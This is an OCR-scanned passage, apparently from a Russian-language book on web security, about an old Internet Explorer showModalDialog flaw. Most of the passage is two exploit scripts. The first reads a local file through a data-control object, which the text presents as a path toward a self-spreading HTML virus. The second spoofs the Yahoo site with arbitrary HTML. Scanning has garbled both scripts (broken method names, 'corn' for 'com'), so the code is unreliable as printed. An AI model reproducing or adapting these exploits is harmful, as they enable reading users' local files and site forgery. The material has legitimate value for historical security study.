Дает ему возможность работать с локальными файлами. Дальнейшее развитие этой идеи вполне может привести

К созданию полноценного html-вируса, размножающегося при загрузке из Сети, а не только из локального

файла, как это было с вирусом HTML.Internal:

<SCRIPT>

s="about:<SCRIPT>a=window. open С view-source: x');a. document, open (); "+

"a. document, write(\"<object id='myTDC' width=100height=100"+

"classid="CLSID:333C7BC4-460F-11DO-BC04-0080C7055A83'>"+

"<param name='DataURL' value=' с:/test. txf>"+

"<param name='UseHeader' value=False>"+

"<param name='CharSet' VALUE^iso-SSSO-I^"

"<param name='FieldDelim' value='}'>"+

"<parani name='RowDelim' value='}'>"+

"<param name='TextQualifier' value='}'>"

"</object><torm><textarea datasrc='SmyTDC' datafld='Column1' rows=10 cols=80>"+

"</textarea></form>\"); a. document, write"+

"('<SCRIPT>setTimeout(\"alert(document.forms[0].elements[0].va.lue)\",4000)</SCRIPT'):"+

"a. document, write('>'); a. document, close(); close ();</"+

"SCRIPT>%01file://c:/";

b=showModalDialog(s);

</SCRIPT>

Использование этой же ошибки в целях подделки сайтов демонстрирует следующий код:

<SCRIPT>

b=showModalDialog(

"about:<SCRIPT>a=window.open(' http://www. yahoo, corn'); "

+"a. document. writeC <HTML><HEAD><TITLE>Yahoo</TITLE><BODY></HEAD>Любoйhtml-кoд'); close()</"

+"SCRIPT>%01http://www. yahoo, corn");

</SCRIPT>